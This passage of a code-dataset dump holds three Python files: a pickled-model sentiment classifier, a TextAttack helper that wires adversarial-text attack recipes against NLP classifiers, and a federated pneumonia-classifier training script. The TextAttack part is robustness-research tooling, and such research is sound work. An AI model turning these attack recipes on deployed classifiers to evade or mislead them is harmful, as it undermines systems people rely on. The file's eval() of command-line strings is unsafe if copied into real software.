sklearn.feature_extraction.text import HashingVectorizer\nimport numpy as np\nimport re\nimport os\nimport pickle\n\nclass SentimentClasify:\n\n\t@staticmethod\n\tdef getSentiment(sentence):\n\t\tcurrent_directory = os.path.dirname(__file__)\n\t\tskipped_words = pickle.load(open(os.path.join(current_directory, 'Classifiers', 'stopwordsClassifier.pkl'), 'rb'))\n\t\tclassifier = pickle.load(open(os.path.join(current_directory, 'Classifiers', 'classifier.pkl'), 'rb'))\n\n\t\tdef tokenizeText(opinions):\n\t\t\topinions = re.sub('<[^>]*>', '', opinions)\n\t\t\topinions = re.sub('[\\W]+', ' ', opinions.lower())\n\t\t\ttokenizedText = [w for w in opinions.split() if w not in skipped_words]\n\t\t\treturn tokenizedText\n\n\t\tvector = HashingVectorizer(decode_error='strict', n_features=2**21, preprocessor=None, tokenizer=tokenizeText, norm='l2', binary=True, alternate_sign=True, ngram_range=(1, 2))\n\t\tlabel = {0:'Negatywna', 1:'Pozytywna'}\n\t\tX = vector.transform(sentence)\n\t\tif label[classifier.predict(X)[0]] == 'Pozytywna':\n\t\t\tpositive = True\n\t\telse: \n\t\t\tpositive = False\n\t\tsentiment = {\"Positive\": positive, \"Probability\": np.max(classifier.predict_proba(X))*100}\n\t\treturn sentiment","sub_path":"sentimentClasify.py","file_name":"sentimentClasify.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"301724898","text":"import argparse\nimport numpy as np\nimport os\nimport random\nimport sys\nimport textattack\nimport time\nimport torch\nimport pickle\nimport copy\n\nRECIPE_NAMES = {\n 'alzantot': 'textattack.attack_recipes.Alzantot2018',\n 'alz-adjusted': 'textattack.attack_recipes.Alzantot2018Adjusted',\n 'deepwordbug': 'textattack.attack_recipes.DeepWordBugGao2018',\n 'hotflip': 'textattack.attack_recipes.HotFlipEbrahimi2017',\n 'kuleshov': 'textattack.attack_recipes.Kuleshov2017',\n 'seq2sick': 'textattack.attack_recipes.Seq2SickCheng2018BlackBox',\n 'textfooler': 'textattack.attack_recipes.TextFoolerJin2019',\n 'tf-adjusted': 'textattack.attack_recipes.TextFoolerJin2019Adjusted',\n}\n\nMODEL_CLASS_NAMES = {\n #\n # Text classification models\n #\n \n # BERT models - default uncased\n 'bert-ag-news': 'textattack.models.classification.bert.BERTForAGNewsClassification',\n 'bert-imdb': 'textattack.models.classification.bert.BERTForIMDBSentimentClassification',\n 'bert-mr': 'textattack.models.classification.bert.BERTForMRSentimentClassification',\n 'bert-yelp-sentiment': 'textattack.models.classification.bert.BERTForYelpSentimentClassification',\n # CNN models\n 'cnn-ag-news': 'textattack.models.classification.cnn.WordCNNForAGNewsClassification',\n 'cnn-imdb': 'textattack.models.classification.cnn.WordCNNForIMDBSentimentClassification',\n 'cnn-mr': 'textattack.models.classification.cnn.WordCNNForMRSentimentClassification',\n 'cnn-yelp-sentiment': 'textattack.models.classification.cnn.WordCNNForYelpSentimentClassification',\n # LSTM models\n 'lstm-ag-news': 'textattack.models.classification.lstm.LSTMForAGNewsClassification',\n 'lstm-imdb': 'textattack.models.classification.lstm.LSTMForIMDBSentimentClassification',\n 'lstm-mr': 'textattack.models.classification.lstm.LSTMForMRSentimentClassification',\n 'lstm-yelp-sentiment': 'textattack.models.classification.lstm.LSTMForYelpSentimentClassification',\n #\n # Textual entailment models\n #\n # BERT models\n 'bert-mnli': 'textattack.models.entailment.bert.BERTForMNLI',\n 'bert-snli': 'textattack.models.entailment.bert.BERTForSNLI',\n #\n # Translation models\n #\n 't5-en2fr': 'textattack.models.translation.t5.T5EnglishToFrench',\n 't5-en2de': 'textattack.models.translation.t5.T5EnglishToGerman',\n 't5-en2ro': 'textattack.models.translation.t5.T5EnglishToRomanian',\n #\n # Summarization models\n #\n 't5-summ': 'textattack.models.summarization.T5Summarization',\n}\n\nDATASET_BY_MODEL = {\n #\n # Text classification datasets\n #\n # AG News\n 'bert-ag-news': textattack.datasets.classification.AGNews,\n 'cnn-ag-news': textattack.datasets.classification.AGNews,\n 'lstm-ag-news': textattack.datasets.classification.AGNews,\n # IMDB \n 'bert-imdb': textattack.datasets.classification.IMDBSentiment,\n 'cnn-imdb': textattack.datasets.classification.IMDBSentiment,\n 'lstm-imdb': textattack.datasets.classification.IMDBSentiment,\n # MR\n 'bert-mr': textattack.datasets.classification.MovieReviewSentiment,\n 'cnn-mr': textattack.datasets.classification.MovieReviewSentiment,\n 'lstm-mr': textattack.datasets.classification.MovieReviewSentiment,\n # Yelp\n 'bert-yelp-sentiment': textattack.datasets.classification.YelpSentiment,\n 'cnn-yelp-sentiment': textattack.datasets.classification.YelpSentiment,\n 'lstm-yelp-sentiment': textattack.datasets.classification.YelpSentiment,\n #\n # Textual entailment datasets\n #\n 'bert-mnli': textattack.datasets.entailment.MNLI,\n 'bert-snli': textattack.datasets.entailment.SNLI,\n #\n # Translation datasets\n #\n 't5-en2de': textattack.datasets.translation.NewsTest2013EnglishToGerman,\n}\n\nTRANSFORMATION_CLASS_NAMES = {\n 'word-swap-embedding': 'textattack.transformations.WordSwapEmbedding',\n 'word-swap-homoglyph': 'textattack.transformations.WordSwapHomoglyph',\n 'word-swap-neighboring-char-swap': 'textattack.transformations.WordSwapNeighboringCharacterSwap',\n 'word-swap-random-char-deletion': 'textattack.transformations.WordSwapRandomCharacterDeletion',\n 'word-swap-random-char-insertion': 'textattack.transformations.WordSwapRandomCharacterInsertion',\n 'word-swap-random-char-substitution': 'textattack.transformations.WordSwapRandomCharacterSubstitution',\n 'word-swap-wordnet': 'textattack.transformations.WordSwapWordNet',\n}\n\nCONSTRAINT_CLASS_NAMES = {\n #\n # Semantics constraints\n #\n 'embedding': 'textattack.constraints.semantics.WordEmbeddingDistance',\n 'bert': 'textattack.constraints.semantics.sentence_encoders.BERT',\n 'infer-sent': 'textattack.constraints.semantics.sentence_encoders.InferSent',\n 'thought-vector': 'textattack.constraints.semantics.sentence_encoders.ThoughtVector',\n 'use': 'textattack.constraints.semantics.sentence_encoders.UniversalSentenceEncoder',\n #\n # Grammaticality constraints\n #\n 'lang-tool': 'textattack.constraints.grammaticality.LanguageTool', \n 'part-of-speech': 'textattack.constraints.grammaticality.PartOfSpeech', \n 'goog-lm': 'textattack.constraints.grammaticality.language_models.GoogleLanguageModel',\n 'gpt2': 'textattack.constraints.grammaticality.language_models.GPT2',\n #\n # Overlap constraints\n #\n 'bleu': 'textattack.constraints.overlap.BLEU', \n 'chrf': 'textattack.constraints.overlap.chrF', \n 'edit-distance': 'textattack.constraints.overlap.LevenshteinEditDistance',\n 'meteor': 'textattack.constraints.overlap.METEOR',\n 'max-words-perturbed': 'textattack.constraints.overlap.MaxWordsPerturbed',\n #\n # Pre-transformation constraints\n #\n 'repeat': 'textattack.constraints.pre_transformation.RepeatModification',\n 'stopword': 'textattack.constraints.pre_transformation.StopwordModification',\n}\n\nSEARCH_CLASS_NAMES = {\n 'beam-search': 'textattack.search_methods.BeamSearch',\n 'greedy': 'textattack.search_methods.GreedySearch',\n 'ga-word': 'textattack.search_methods.GeneticAlgorithm',\n 'greedy-word-wir': 'textattack.search_methods.GreedyWordSwapWIR',\n}\n\nGOAL_FUNCTION_CLASS_NAMES = {\n 'non-overlapping-output': 'textattack.goal_functions.NonOverlappingOutput',\n 'targeted-classification': 'textattack.goal_functions.TargetedClassification',\n 'untargeted-classification': 'textattack.goal_functions.UntargetedClassification',\n}\n\ndef set_seed(random_seed):\n random.seed(random_seed)\n np.random.seed(random_seed)\n torch.manual_seed(random_seed)\n\ndef get_args():\n # Parser for regular arguments\n parser = argparse.ArgumentParser(\n description='A commandline parser for TextAttack', \n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--transformation', type=str, required=False,\n default='word-swap-embedding', choices=TRANSFORMATION_CLASS_NAMES.keys(),\n help='The transformations to apply.')\n\n parser.add_argument('--model', type=str, required=False, default='bert-yelp-sentiment',\n choices=MODEL_CLASS_NAMES.keys(), help='The classification model to attack.')\n \n parser.add_argument('--constraints', type=str, required=False, nargs='*',\n default=['repeat', 'stopword'],\n help=('Constraints to add to the attack. Usage: \"--constraints {constraint}:{arg_1}={value_1},{arg_3}={value_3}\". Choices: ' + str(CONSTRAINT_CLASS_NAMES.keys())))\n \n parser.add_argument('--out-dir', type=str, required=False, default=None,\n help='A directory to output results to.')\n \n parser.add_argument('--enable-visdom', action='store_true',\n help='Enable logging to visdom.')\n \n parser.add_argument('--enable-wandb', action='store_true',\n help='Enable logging to Weights & Biases.')\n \n parser.add_argument('--disable-stdout', action='store_true',\n help='Disable logging to stdout')\n \n parser.add_argument('--enable-csv', nargs='?', default=None, const='fancy', type=str,\n help='Enable logging to csv. Use --enable-csv plain to remove [[]] around words.')\n\n parser.add_argument('--num-examples', '-n', type=int, required=False, \n default='5', help='The number of examples to process.')\n \n parser.add_argument('--num-examples-offset', '-o', type=int, required=False, \n default=0, help='The offset to start at in the dataset.')\n\n parser.add_argument('--shuffle', action='store_true', required=False, \n default=False, help='Randomly shuffle the data before attacking')\n \n parser.add_argument('--interactive', action='store_true', default=False,\n help='Whether to run attacks interactively.')\n \n parser.add_argument('--attack-n', action='store_true', default=False,\n help='Whether to run attack until `n` examples have been attacked (not skipped).')\n \n parser.add_argument('--parallel', action='store_true', default=False,\n help='Run attack using multiple GPUs.')\n\n goal_function_choices = ', '.join(GOAL_FUNCTION_CLASS_NAMES.keys())\n parser.add_argument('--goal-function', '-g', default='untargeted-classification',\n help=f'The goal function to use. choices: {goal_function_choices}')\n \n def str_to_int(s): return sum((ord(c) for c in s))\n parser.add_argument('--random-seed', default=str_to_int('TEXTATTACK'))\n\n parser.add_argument('--checkpoint-dir', required=False, type=str, default=default_checkpoint_dir(),\n help='A directory to save/load checkpoint files.')\n\n parser.add_argument('--checkpoint-interval', required=False, type=int, \n help='Interval for saving checkpoints. If not set, no checkpoints will be saved.')\n \n attack_group = parser.add_mutually_exclusive_group(required=False)\n \n search_choices = ', '.join(SEARCH_CLASS_NAMES.keys())\n attack_group.add_argument('--search', '-s', '--search-method', type=str, \n required=False, default='greedy-word-wir', \n help=f'The search method to use. choices: {search_choices}')\n \n attack_group.add_argument('--recipe', '-r', type=str, required=False, default=None,\n help='full attack recipe (overrides provided goal function, transformation & constraints)',\n choices=RECIPE_NAMES.keys())\n\n # Parser for parsing args for resume\n resume_parser = argparse.ArgumentParser(\n description='A commandline parser for TextAttack', \n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n resume_parser.add_argument('--checkpoint-file', '-f', type=str, required=False, default='latest', \n help='Name of checkpoint file to resume attack from. If \"latest\" is entered, recover latest checkpoint.')\n\n resume_parser.add_argument('--checkpoint-dir', '-d', required=False, type=str, default=default_checkpoint_dir(),\n help='A directory to save/load checkpoint files.')\n\n resume_parser.add_argument('--checkpoint-interval', '-i', required=False, type=int, \n help='Interval for saving checkpoints. If not set, no checkpoints will be saved.')\n\n resume_parser.add_argument('--parallel', action='store_true', default=False,\n help='Run attack using multiple GPUs.')\n\n if sys.argv[1:] and sys.argv[1].lower() == 'resume':\n args = resume_parser.parse_args(sys.argv[2:])\n setattr(args, 'checkpoint_resume', True)\n else:\n command_line_args = None if sys.argv[1:] else ['-h'] # Default to help with empty arguments.\n args = parser.parse_args(command_line_args)\n setattr(args, 'checkpoint_resume', False)\n\n if args.checkpoint_interval and args.shuffle:\n # Not allowed b/c we cannot recover order of shuffled data\n raise ValueError('Cannot use `--checkpoint-interval` with `--shuffle=True`')\n \n set_seed(args.random_seed)\n \n return args\n\ndef parse_transformation_from_args(args):\n # Transformations\n transformation = args.transformation\n if ':' in transformation:\n transformation_name, params = transformation.split(':')\n if transformation_name not in TRANSFORMATION_CLASS_NAMES:\n raise ValueError(f'Error: unsupported transformation {transformation_name}')\n transformation = eval(f'{TRANSFORMATION_CLASS_NAMES[transformation_name]}({params})')\n elif transformation in TRANSFORMATION_CLASS_NAMES:\n transformation = eval(f'{TRANSFORMATION_CLASS_NAMES[transformation]}()')\n else:\n raise ValueError(f'Error: unsupported transformation {transformation}')\n return transformation\n\ndef parse_goal_function_from_args(args, model):\n # Goal Functions\n goal_function = args.goal_function\n if ':' in goal_function:\n goal_function_name, params = goal_function.split(':')\n if goal_function_name not in GOAL_FUNCTION_CLASS_NAMES:\n raise ValueError(f'Error: unsupported goal_function {goal_function_name}')\n goal_function = eval(f'{GOAL_FUNCTION_CLASS_NAMES[goal_function_name]}(model, {params})')\n elif goal_function in GOAL_FUNCTION_CLASS_NAMES:\n goal_function = eval(f'{GOAL_FUNCTION_CLASS_NAMES[goal_function]}(model)')\n else:\n raise ValueError(f'Error: unsupported goal_function {goal_function}')\n return goal_function\n\ndef parse_constraints_from_args(args):\n # Constraints\n if not args.constraints: \n return []\n \n _constraints = []\n for constraint in args.constraints:\n if ':' in constraint:\n constraint_name, params = constraint.split(':')\n if constraint_name not in CONSTRAINT_CLASS_NAMES:\n raise ValueError(f'Error: unsupported constraint {constraint_name}')\n _constraints.append(eval(f'{CONSTRAINT_CLASS_NAMES[constraint_name]}({params})'))\n elif constraint in CONSTRAINT_CLASS_NAMES:\n _constraints.append(eval(f'{CONSTRAINT_CLASS_NAMES[constraint]}()'))\n else:\n raise ValueError(f'Error: unsupported constraint {constraint}')\n \n return _constraints\n\ndef parse_recipe_from_args(model, args):\n if ':' in args.recipe:\n recipe_name, params = args.recipe.split(':')\n if recipe_name not in RECIPE_NAMES:\n raise ValueError(f'Error: unsupported recipe {recipe_name}')\n recipe = eval(f'{RECIPE_NAMES[recipe_name]}(model, {params})')\n elif args.recipe in RECIPE_NAMES:\n recipe = eval(f'{RECIPE_NAMES[args.recipe]}(model)')\n else:\n raise ValueError('Invalid recipe {args.recipe}')\n return recipe\n\ndef parse_goal_function_and_attack_from_args(args):\n if ':' in args.model:\n model_name, params = args.model.split(':')\n if model_name not in MODEL_CLASS_NAMES:\n raise ValueError(f'Error: unsupported model {model_name}')\n model = eval(f'{MODEL_CLASS_NAMES[model_name]}({params})')\n elif args.model in MODEL_CLASS_NAMES:\n model = eval(f'{MODEL_CLASS_NAMES[args.model]}()')\n else: \n raise ValueError(f'Error: unsupported model {args.model}')\n if args.recipe:\n attack = parse_recipe_from_args(model, args)\n goal_function = attack.goal_function\n return goal_function, attack\n else:\n goal_function = parse_goal_function_from_args(args, model)\n transformation = parse_transformation_from_args(args)\n constraints = parse_constraints_from_args(args)\n if ':' in args.search:\n search_name, params = args.search.split(':')\n if search_name not in SEARCH_CLASS_NAMES:\n raise ValueError(f'Error: unsupported search {search_name}')\n search_method = eval(f'{SEARCH_CLASS_NAMES[search_name]}({params})')\n elif args.search in SEARCH_CLASS_NAMES:\n search_method = eval(f'{SEARCH_CLASS_NAMES[args.search]}()')\n else:\n raise ValueError(f'Error: unsupported attack {args.search}')\n return goal_function, textattack.shared.Attack(goal_function, constraints, transformation, search_method)\n\ndef parse_logger_from_args(args):# Create logger\n attack_log_manager = textattack.loggers.AttackLogManager()\n # Set default output directory to `textattack/outputs`.\n if not args.out_dir:\n current_dir = os.path.dirname(os.path.realpath(__file__))\n outputs_dir = os.path.join(current_dir, os.pardir, os.pardir, os.pardir, 'outputs')\n args.out_dir = os.path.normpath(outputs_dir)\n \n # Output file.\n out_time = int(time.time()*1000) # Output file\n outfile_name = 'attack-{}.txt'.format(out_time)\n attack_log_manager.add_output_file(os.path.join(args.out_dir, outfile_name))\n \n # CSV\n if args.enable_csv:\n outfile_name = 'attack-{}.csv'.format(out_time)\n color_method = None if args.enable_csv == 'plain' else 'file'\n csv_path = os.path.join(args.out_dir, outfile_name)\n attack_log_manager.add_output_csv(csv_path, color_method)\n print('Logging to CSV at path {}.'.format(csv_path))\n\n # Visdom\n if args.enable_visdom:\n attack_log_manager.enable_visdom()\n \n # Weights & Biases\n if args.enable_wandb:\n attack_log_manager.enable_wandb()\n\n # Stdout\n if not args.disable_stdout:\n attack_log_manager.enable_stdout()\n return attack_log_manager\n\ndef parse_checkpoint_from_args(args):\n if args.checkpoint_file.lower() == 'latest':\n chkpt_file_names = [f for f in os.listdir(args.checkpoint_dir) if f.endswith('.ta.chkpt')]\n assert chkpt_file_names, \"Checkpoint directory is empty\"\n timestamps = [int(f.replace('.ta.chkpt', '')) for f in chkpt_file_names]\n latest_file = str(max(timestamps)) + '.ta.chkpt'\n checkpoint_path = os.path.join(args.checkpoint_dir, latest_file)\n else:\n checkpoint_path = os.path.join(args.checkpoint_dir, args.checkpoint_file)\n \n checkpoint = textattack.shared.Checkpoint.load(checkpoint_path)\n set_seed(checkpoint.args.random_seed)\n\n return checkpoint\n\ndef default_checkpoint_dir():\n current_dir = os.path.dirname(os.path.realpath(__file__))\n checkpoints_dir = os.path.join(current_dir, os.pardir, os.pardir, os.pardir, 'checkpoints')\n return os.path.normpath(checkpoints_dir)\n\ndef merge_checkpoint_args(saved_args, cmdline_args):\n \"\"\" Merge previously saved arguments for checkpoint and newly entered arguments \"\"\"\n args = copy.deepcopy(saved_args)\n # Newly entered arguments take precedence\n args.checkpoint_resume = cmdline_args.checkpoint_resume\n args.parallel = cmdline_args.parallel\n args.checkpoint_dir = cmdline_args.checkpoint_dir\n # If set, we replace\n if cmdline_args.checkpoint_interval:\n args.checkpoint_interval = cmdline_args.checkpoint_interval\n \n return args\n","sub_path":"textattack/shared/scripts/run_attack_args_helper.py","file_name":"run_attack_args_helper.py","file_ext":"py","file_size_in_byte":19334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"264421796","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport configparser\nimport argparse\nimport visdom\nimport tqdm\nimport shutil\nimport random\nimport numpy as np\nfrom os import path, remove\nfrom warnings import warn\nfrom datetime import datetime\nfrom tabulate import tabulate\nfrom torchvision import datasets, transforms, models\nfrom torchlib.dataloader import PPPP\nfrom torchlib.models import vgg16, resnet18, conv_at_resolution\nfrom torchlib.utils import (\n LearningRateScheduler,\n Arguments,\n train,\n test,\n save_model,\n save_config_results,\n AddGaussianNoise,\n)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--config\",\n type=str,\n required=True,\n default=\"configs/pneumonia.ini\",\n help=\"Path to config\",\n )\n parser.add_argument(\n \"--train_federated\", action=\"store_true\", help=\"Train in federated setting\"\n )\n parser.add_argument(\n \"--dataset\",\n type=str,\n default=\"pneumonia\",\n choices=[\"pneumonia\", \"mnist\"],\n help=\"which dataset?\",\n )\n parser.add_argument(\n \"--no_visdom\", action=\"store_false\", help=\"dont use a visdom server\"\n )\n parser.add_argument(\n \"--no_cuda\", action=\"store_true\", help=\"dont use a visdom server\"\n )\n parser.add_argument(\n \"--resume_checkpoint\",\n type=str,\n default=None,\n help=\"Start training from older model checkpoint\",\n )\n parser.add_argument(\n \"--websockets\",\n action=\"store_true\",\n help=\"Use websockets instead of virtual workers\",\n )\n cmd_args = parser.parse_args()\n\n config = configparser.ConfigParser()\n assert path.isfile(cmd_args.config), \"config file not found\"\n config.read(cmd_args.config)\n\n args = Arguments(cmd_args, config, mode=\"train\")\n\n if args.train_federated:\n import syft as sy\n from torchlib.websocket_utils import read_websocket_config\n\n hook = sy.TorchHook(torch)\n worker_dict = read_websocket_config(\"configs/websetting/config.csv\")\n worker_names = [id_dict[\"id\"] for _, id_dict in worker_dict.items()]\n if cmd_args.websockets:\n kwargs_websocket = {\n \"hook\": hook,\n \"verbose\": False,\n }\n workers = [\n sy.WebsocketClientWorker(\n id=id_dict[\"id\"],\n port=id_dict[\"port\"],\n host=id_dict[\"host\"],\n **kwargs_websocket,\n )\n for row, id_dict in worker_dict.items()\n ]\n\n else:\n workers = [\n sy.VirtualWorker(hook, id=id_dict[\"id\"])\n for row, id_dict in worker_dict.items()\n ]\n\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n torch.manual_seed(args.seed)\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\") # pylint: disable=no-member\n\n kwargs = {\"num_workers\": 1, \"pin_memory\": True} if use_cuda else {}\n\n timestamp = datetime.now().strftime(\"%Y-%m-%d_%H-%M\")\n exp_name = \"{:s}_{:s}_{:s}\".format(\n \"federated\" if args.train_federated else \"vanilla\", args.dataset, timestamp\n )\n\n \"\"\"\n Dataset creation and definition\n \"\"\"\n class_names = None\n if args.dataset == \"mnist\":\n num_classes = 10\n train_tf = [\n transforms.Resize(args.train_resolution),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,)),\n ]\n test_tf = [\n transforms.Resize(args.inference_resolution),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,)),\n ]\n if args.pretrained:\n repeat = transforms.Lambda(\n lambda x: torch.repeat_interleave( # pylint: disable=no-member\n x, 3, dim=0\n )\n )\n train_tf.append(repeat)\n test_tf.append(repeat)\n dataset = datasets.MNIST(\n \"../data\",\n train=True,\n download=True,\n transform=transforms.Compose(train_tf),\n )\n\n testset = datasets.MNIST(\n \"../data\", train=False, transform=transforms.Compose(test_tf),\n )\n elif args.dataset == \"pneumonia\":\n num_classes = 3\n \"\"\"\n Different train and inference resolution only works with adaptive\n pooling in model activated\n \"\"\"\n train_tf = [\n transforms.RandomVerticalFlip(p=args.vertical_flip_prob),\n transforms.RandomAffine(\n degrees=args.rotation,\n translate=(args.translate, args.translate),\n scale=(1.0 - args.scale, 1.0 + args.scale),\n shear=args.shear,\n fillcolor=0.0,\n ),\n transforms.Resize(args.inference_resolution),\n transforms.RandomCrop(args.train_resolution),\n transforms.ToTensor(),\n transforms.Normalize((0.57282609,), (0.17427578,)),\n transforms.RandomApply(\n [AddGaussianNoise(mean=0.0, std=args.noise_std)], p=args.noise_prob\n ),\n ]\n # TODO: Add normalization\n test_tf = [\n transforms.Resize(args.inference_resolution),\n transforms.CenterCrop(args.inference_resolution),\n transforms.ToTensor(),\n transforms.Normalize((0.57282609,), (0.17427578,)),\n ]\n\n \"\"\"\n Duplicate grayscale one channel image into 3 channels\n \"\"\"\n if args.pretrained:\n repeat = transforms.Lambda(\n lambda x: torch.repeat_interleave( # pylint: disable=no-member\n x, 3, dim=0\n )\n )\n train_tf.append(repeat)\n test_tf.append(repeat)\n dataset = PPPP(\n \"data/Labels.csv\",\n train=True,\n transform=transforms.Compose(train_tf),\n seed=args.seed,\n )\n \"\"\" Removed because bad practice\n testset = PPPP(\n \"data/Labels.csv\",\n train=False,\n transform=transforms.Compose(test_tf),\n seed=args.seed,\n )\"\"\"\n class_names = {0: \"normal\", 1: \"bacterial pneumonia\", 2: \"viral pneumonia\"}\n occurances = dataset.get_class_occurances()\n else:\n raise NotImplementedError(\"dataset not implemented\")\n\n total_L = len(dataset)\n fraction = 1.0 / args.val_split\n dataset, valset = torch.utils.data.random_split(\n dataset,\n [int(round(total_L * (1.0 - fraction))), int(round(total_L * fraction))],\n )\n del total_L, fraction\n\n if args.train_federated:\n train_loader = sy.FederatedDataLoader(\n dataset.federate(tuple(workers)),\n batch_size=args.batch_size,\n shuffle=True,\n **kwargs,\n )\n \"\"\"val_loader = sy.FederatedDataLoader(\n valset.federate((bob, alice, charlie)),\n batch_size=args.test_batch_size,\n shuffle=True,\n **kwargs\n )\"\"\"\n else:\n train_loader = torch.utils.data.DataLoader(\n dataset, batch_size=args.batch_size, shuffle=True, **kwargs\n )\n val_loader = torch.utils.data.DataLoader(\n valset, batch_size=args.test_batch_size, shuffle=False, **kwargs\n )\n\n \"\"\" Removed because bad practice\n test_loader = torch.utils.data.DataLoader(\n testset, batch_size=args.test_batch_size, shuffle=True, **kwargs\n )\"\"\"\n cw = None\n if args.class_weights:\n if not occurances:\n occurances = {}\n # if hasattr(dataset, \"get_class_occurances\"):\n # occurances = dataset.get_class_occurances()\n # else:\n for _, c in tqdm.tqdm(\n dataset, total=len(dataset), leave=False, desc=\"calc class weights\"\n ):\n if c.item() in occurances:\n occurances[c] += 1\n else:\n occurances[c] = 1\n cw = torch.zeros((len(occurances))) # pylint: disable=no-member\n for c, n in occurances.items():\n cw[c] = 1.0 / float(n)\n cw /= torch.sum(cw) # pylint: disable=no-member\n cw = cw.to(device)\n\n scheduler = LearningRateScheduler(\n args.epochs, np.log10(args.lr), np.log10(args.end_lr), restarts=args.restarts\n )\n\n ## visdom\n vis_params = None\n if args.visdom:\n vis = visdom.Visdom()\n assert vis.check_connection(\n timeout_seconds=3\n ), \"No connection could be formed quickly\"\n vis_env = path.join(\n args.dataset, \"federated\" if args.train_federated else \"vanilla\", timestamp\n )\n plt_dict = dict(\n name=\"training loss\",\n ytickmax=10,\n xlabel=\"epoch\",\n ylabel=\"loss\",\n legend=[\"train_loss\"],\n )\n vis.line(\n X=np.zeros((1, 3)),\n Y=np.zeros((1, 3)),\n win=\"loss_win\",\n opts={\n \"legend\": [\"train_loss\", \"val_loss\", \"accuracy\"],\n \"xlabel\": \"epochs\",\n \"ylabel\": \"loss / accuracy [%]\",\n },\n env=vis_env,\n )\n vis.line(\n X=np.zeros((1, 1)),\n Y=np.zeros((1, 1)),\n win=\"lr_win\",\n opts={\"legend\": [\"learning_rate\"], \"xlabel\": \"epochs\", \"ylabel\": \"lr\"},\n env=vis_env,\n )\n vis_params = {\"vis\": vis, \"vis_env\": vis_env}\n # model = Net().to(device)\n if args.model == \"vgg16\":\n model = vgg16(\n pretrained=args.pretrained,\n num_classes=num_classes,\n in_channels=3 if args.pretrained else 1,\n adptpool=False,\n input_size=args.inference_resolution,\n )\n elif args.model == \"simpleconv\":\n if args.pretrained:\n warn(\"No pretrained version available\")\n model = conv_at_resolution[args.train_resolution](\n num_classes=num_classes, in_channels=3 if args.pretrained else 1\n )\n elif args.model == \"resnet-18\":\n model = resnet18(\n pretrained=args.pretrained,\n num_classes=num_classes,\n in_channels=3 if args.pretrained else 1,\n adptpool=False,\n input_size=args.inference_resolution,\n )\n else:\n raise NotImplementedError(\"model unknown\")\n # model = resnet18(pretrained=False, num_classes=num_classes, in_channels=1)\n # model = models.vgg16(pretrained=False, num_classes=3)\n # model.classifier = vggclassifier()\n if args.optimizer == \"SGD\":\n optimizer = optim.SGD(\n model.parameters(), lr=args.lr, weight_decay=args.weight_decay,\n ) # TODO momentum is not supported at the moment\n elif args.optimizer == \"Adam\":\n optimizer = optim.Adam(\n model.parameters(),\n lr=args.lr,\n betas=(args.beta1, args.beta2),\n weight_decay=args.weight_decay,\n )\n else:\n raise NotImplementedError(\"optimization not implemented\")\n if args.train_federated:\n from syft.federated.floptimizer import Optims\n\n optimizer = Optims(worker_names, optimizer)\n loss_fn = nn.CrossEntropyLoss(weight=cw, reduction=\"mean\")\n\n start_at_epoch = 1\n if cmd_args.resume_checkpoint:\n print(\"resuming checkpoint - args will be overwritten\")\n state = torch.load(cmd_args.resume_checkpoint, map_location=device)\n start_at_epoch = state[\"epoch\"]\n args = state[\"args\"]\n if args.train_federated:\n opt_state_dict = state[\"optim_state_dict\"]\n for w in worker_names:\n optimizer.get_optim(w).load_state_dict(opt_state_dict[w])\n else:\n optimizer.load_state_dict(state[\"optim_state_dict\"])\n model.load_state_dict(state[\"model_state_dict\"])\n model.to(device)\n\n test(\n args,\n model,\n device,\n val_loader,\n start_at_epoch - 1,\n loss_fn,\n num_classes,\n vis_params=vis_params,\n class_names=class_names,\n )\n accuracies = []\n model_paths = []\n for epoch in range(start_at_epoch, args.epochs + 1):\n if args.train_federated:\n for w in worker_names:\n new_lr = scheduler.adjust_learning_rate(\n optimizer.get_optim(w), epoch - 1\n )\n else:\n new_lr = scheduler.adjust_learning_rate(optimizer, epoch - 1)\n if args.visdom:\n vis.line(\n X=np.asarray([epoch - 1]),\n Y=np.asarray([new_lr]),\n win=\"lr_win\",\n name=\"learning_rate\",\n update=\"append\",\n env=vis_env,\n )\n train(\n args,\n model,\n device,\n train_loader,\n optimizer,\n epoch,\n loss_fn,\n vis_params=vis_params,\n )\n if (epoch % args.test_interval) == 0:\n _, acc = test(\n args,\n model,\n device,\n val_loader,\n epoch,\n loss_fn,\n num_classes=num_classes,\n vis_params=vis_params,\n class_names=class_names,\n )\n model_path = \"model_weights/{:s}_epoch_{:03d}.pt\".format(exp_name, epoch,)\n\n save_model(model, optimizer, model_path, args, epoch)\n accuracies.append(acc)\n model_paths.append(model_path)\n # reversal and formula because we want last occurance of highest value\n accuracies = np.array(accuracies)[::-1]\n am = np.argmax(accuracies)\n highest_acc = len(accuracies) - am - 1\n best_epoch = highest_acc * args.test_interval\n best_model_file = model_paths[highest_acc]\n print(\n \"Highest accuracy was {:.1f}% in epoch {:d}\".format(accuracies[am], best_epoch)\n )\n # load best model on val set\n state = torch.load(best_model_file, map_location=device)\n model.load_state_dict(state[\"model_state_dict\"])\n\n \"\"\"_, result = test(\n args,\n model,\n device,\n val_loader,\n args.epochs + 1,\n loss_fn,\n num_classes=num_classes,\n vis_params=vis_params,\n class_names=class_names,\n )\n print('result: {:.1f} - best accuracy: {:.1f}'.format(result, accuracies[am]))\"\"\"\n shutil.copyfile(\n best_model_file, \"model_weights/final_{:s}.pt\".format(exp_name),\n )\n save_config_results(\n args, accuracies[am], timestamp, \"model_weights/completed_trainings.csv\"\n )\n\n # delete old model weights\n for model_file in model_paths:\n remove(model_file)\n \"\"\"save_model(\n model,\n optimizer,\n \"model_weights/{:s}_{:s}_final.pt\".format(\n \"federated\" if args.train_federated else \"vanilla\", args.dataset\n ),\n 